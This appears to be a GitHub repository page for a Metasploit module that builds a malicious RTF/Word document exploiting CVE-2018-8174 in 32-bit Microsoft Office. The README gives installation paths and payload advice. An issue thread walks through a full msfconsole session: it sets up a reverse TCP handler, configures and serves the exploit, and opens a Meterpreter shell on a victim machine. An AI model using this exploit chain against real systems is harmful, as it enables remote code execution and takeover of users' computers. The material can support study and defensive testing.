
cve-2018-8174-msf's Introduction

CVE-2018-8174-msf

This is a Metasploit module which creates a malicious Word document to exploit CVE-2018-8174, a VBScript memory corruption vulnerability.

This module is a very quick port and uses the exploit sample that was found in the wild. The exploit works only for Microsoft Office 32-bit.

There is a lot that still needs to be improved in this module, but I will update it in the future if I find some time.

Installation

  1. Copy the CVE-2018-8174.rb to /usr/share/metasploit-framework/modules/exploits/windows/fileformat/
  2. Copy the CVE-2018-8174.rtf to /usr/share/metasploit-framework/data/exploits/

The exploit doesn't work very well with Meterpreter shellcode, so it's better to use a non-staged reverse shell.

Disclaimer

DO NOT USE THIS SOFTWARE FOR ILLEGAL PURPOSES.

THE AUTHOR DOES NOT ACCEPT ANY RESPONSIBILITY FOR ANY MISUSE OF THE CODE PROVIDED HERE.

cve-2018-8174-msf's People

Contributors

0x09al

cve-2018-8174-msf's Issues

How To Use In Msf?

0x01 Download CVE-2018-8174 To Kali Linux


root@kali:~# updatedb
root@kali:~# locate CVE-2018-8174.rb
/opt/metasploit-framework/embedded/framework/modules/exploits/windows/fileformat/CVE-2018-8174.rb
root@kali:~# locate CVE-2018-8174.rtf
/opt/metasploit-framework/embedded/framework/data/exploits/CVE-2018-8174.rtf

0x02 listen port

root@kali:~# msfconsole                                                                                                                          
find: unknown predicate `-y'                                                                                                                     
                                                                                                                                                 
                                                                                                                                                 
 ______________________________________________________________________________                                                                  
|                                                                              |                                                                 
|                          3Kom SuperHack II Logon                             |                                                                 
|______________________________________________________________________________|                                                                 
|                                                                              |                                                                 
|                                                                              |                                                                 
|                                                                              |                                                                 
|                 User Name:          [   security    ]                        |                                                                 
|                                                                              |                                                                 
|                 Password:           [               ]                        |                                                                 
|                                                                              |                                                                 
|                                                                              |                                                                 
|                                                                              |                                                                 
|                                   [ OK ]                                     |                                                                 
|______________________________________________________________________________|                                                                 
|                                                                              |                                                                 
|                                                       https://metasploit.com |                                                                 
|______________________________________________________________________________|                                                                 
                                                                                                                                                 
                                                                                                                                                 
       =[ metasploit v4.16.50-dev-                        ]                                                                                      
+ -- --=[ 1752 exploits - 1003 auxiliary - 304 post       ]                                                                                      
+ -- --=[ 536 payloads - 40 encoders - 10 nops            ]                                                                                      
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]                                                                                      
                                                                                                                                                 
msf > use exploit/multi/ha                                                                                                                       
use exploit/multi/hams/steamed  use exploit/multi/handler                                                                                        
msf > use exploit/multi/ha                                                                                                                       
use exploit/multi/hams/steamed  use exploit/multi/handler                                                                                        
msf > use exploit/multi/handler                                                                                                                  
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp                                                                         
payload => windows/meterpreter/reverse_tcp                                                                                                       
msf exploit(multi/handler) > show options                                                                                                        
                                                                                                                                                 
Module options (exploit/multi/handler):                                                                                                          
                                                                                                                                                 
   Name  Current Setting  Required  Description                                                                                                  
   ----  ---------------  --------  -----------                                                                                                  
                                                                                                                                                 
                                                                                                                                                 
Payload options (windows/meterpreter/reverse_tcp):                                                                                               
                                                                                                                                                 
   Name      Current Setting  Required  Description                                                                                              
   ----      ---------------  --------  -----------                                                                                              
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)                                                
   LHOST                      yes       The listen address                                                                                       
   LPORT     4444             yes       The listen port                                                                                          
                                                                                                                                                 
                                                                                                                                                 
Exploit target:                                                                                                                                  
                                                                                                                                                 
   Id  Name                                                                                                                                      
   --  ----                                                                                                                                      
   0   Wildcard Target                                                                                                                           
                                                                                                                                                 
                                                                                                                                                 
msf exploit(multi/handler) > set lhost 10.10.10.103                                                                                              
lhost => 10.10.10.103                                                                                                                            
msf exploit(multi/handler) > show options                                                                                                        
                                                                                                                                                 
Module options (exploit/multi/handler):                                                                                                          
                                                                                                                                                 
   Name  Current Setting  Required  Description                                                                                                  
   ----  ---------------  --------  -----------                                                                                                  
                                                                                                                                                 
                                                                                                                                                 
Payload options (windows/meterpreter/reverse_tcp):                                                                                               
                                                                                                                                                 
   Name      Current Setting  Required  Description                                                                                              
   ----      ---------------  --------  -----------                                                                                              
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)                                                
   LHOST     10.10.10.103     yes       The listen address                                                                                       
   LPORT     4444             yes       The listen port                                                                                          
                                                                                                                                                 
                                                                                                                                                 
Exploit target:                                                                                                                                  
                                                                                                                                                 
   Id  Name                                                                                                                                      
   --  ----                                                                                                                                      
   0   Wildcard Target                                                                                                                           
                                                                                                                                                 
                                                                                                                                                 
msf exploit(multi/handler) > run -j                                                                                                              
[*] Exploit running as background job 0.                                                                                                         
                                                                                                                                                 
[*] Started reverse TCP handler on 10.10.10.103:4444                                                                                             
msf exploit(multi/handler) > netstat -ntpl                                                                                                       
[*] exec: netstat -ntpl                                                                                                                          
                                                                                                                                                 
Active Internet connections (only servers)                                                                                                       
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name                                                 
tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN      726/postgres                                                     
tcp        0      0 10.10.10.103:4444       0.0.0.0:*               LISTEN      18651/ruby                                                       
tcp        0      0 0.0.0.0:3391            0.0.0.0:*               LISTEN      697/sshd                                                         
tcp6       0      0 :::80                   :::*                    LISTEN      422/apache2                                                      
tcp6       0      0 ::1:3350                :::*                    LISTEN      699/xrdp-sesman                                                  
tcp6       0      0 ::1:5432                :::*                    LISTEN      726/postgres                                                     
tcp6       0      0 :::3389                 :::*                    LISTEN      747/xrdp                                                         
tcp6       0      0 :::3391                 :::*                    LISTEN      697/sshd                                                         

0x03 use CVE-2018-8174-msf


msf exploit(multi/handler) > use exploit/windows/fileformat/CVE-2018-8174                                                                             
msf exploit(windows/fileformat/CVE-2018-8174) > show options                                                                                          
                                                                                                                                                      
Module options (exploit/windows/fileformat/CVE-2018-8174):                                                                                            
                                                                                                                                                      
   Name      Current Setting  Required  Description                                                                                                   
   ----      ---------------  --------  -----------                                                                                                   
   FILENAME  msf.rtf          yes       The file name.                                                                                                
   SRVHOST   0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0                          
   SRVPORT   8080             yes       The local port to listen on.                                                                                  
   SSL       false            no        Negotiate SSL for incoming connections                                                                        
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)                                              
   URIPATH   /                yes       The URI path to use                                                                                           
                                                                                                                                                      
                                                                                                                                                      
Exploit target:                                                                                                                                       
                                                                                                                                                      
   Id  Name                                                                                                                                           
   --  ----                                                                                                                                           
   0   Microsoft Office Word 32-bit                                                                                                                   
                                                                                                                                                      
                                                                                                                                                      
msf exploit(windows/fileformat/CVE-2018-8174) > set srvhost 10.10.10.103                                                                              
srvhost => 10.10.10.103                                                                                                                               
msf exploit(windows/fileformat/CVE-2018-8174) > set uri                                                                                               
set urihost  set uripath  set uriport                                                                                                                 
msf exploit(windows/fileformat/CVE-2018-8174) > set urip                                                                                              
set uripath  set uriport                                                                                                                              
msf exploit(windows/fileformat/CVE-2018-8174) > set uripath /exploit                                                                                  
uripath => /exploit                                                                                                                                   
msf exploit(windows/fileformat/CVE-2018-8174) > show options                                                                                          
                                                                                                                                                      
Module options (exploit/windows/fileformat/CVE-2018-8174):                                                                                            
                                                                                                                                                      
   Name      Current Setting  Required  Description                                                                                                   
   ----      ---------------  --------  -----------                                                                                                   
   FILENAME  msf.rtf          yes       The file name.                                                                                                
   SRVHOST   10.10.10.103     yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0                          
   SRVPORT   8080             yes       The local port to listen on.                                                                                  
   SSL       false            no        Negotiate SSL for incoming connections                                                                        
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)                                              
   URIPATH   /exploit         yes       The URI path to use                                                                                           
                                                                                                                                                      
                                                                                                                                                      
Exploit target:                                                                                                                                       
                                                                                                                                                      
   Id  Name                                                                                                                                           
   --  ----                                                                                                                                           
   0   Microsoft Office Word 32-bit                                                                                                                   
                                                                                                                                                      
                                                                                                                                                      
msf exploit(windows/fileformat/CVE-2018-8174) > run                                                                                                   
[*] Exploit running as background job 1.                                                                                                              
msf exploit(windows/fileformat/CVE-2018-8174) >                                                                                                       
[+] msf.rtf stored at /root/.msf4/local/msf.rtf                                                                                                       
[*] Using URL: http://10.10.10.103:8080/exploit                                                                                                       
[*] Server started.                                                                                                                                   
[*] 10.10.10.106     CVE-2018-8174 - Delivering Exploit                                                                                               
[*] Sending stage (179779 bytes) to 10.10.10.106                                                                                                      
[*] Meterpreter session 1 opened (10.10.10.103:4444 -> 10.10.10.106:49318) at 2018-06-21 22:00:09 -0400                                               
                                                                                                                                                      
msf exploit(windows/fileformat/CVE-2018-8174) > sessions                                                                                              
                                                                                                                                                      
Active sessions                                                                                                                                       
===============                                                                                                                                       
                                                                                                                                                      
  Id  Name  Type                     Information                   Connection                                                                         
  --  ----  ----                     -----------                   ----------                                                                         
  1         meterpreter x86/windows  CTF-PC\shaoyu @ CTF-PC  10.10.10.103:4444 -> 10.10.10.106:49318 (10.10.10.106)                             
                                                                                                                                                      
msf exploit(windows/fileformat/CVE-2018-8174) >                                                                                                       

Port it to plain ruby

Hello there,

Can you port the exploit to plain Ruby, without Metasploit? I mean, I'm rewriting and centralizing exploits in the CVE-in-Ruby repository to allow people to understand exploits written in plain Ruby instead of other languages.
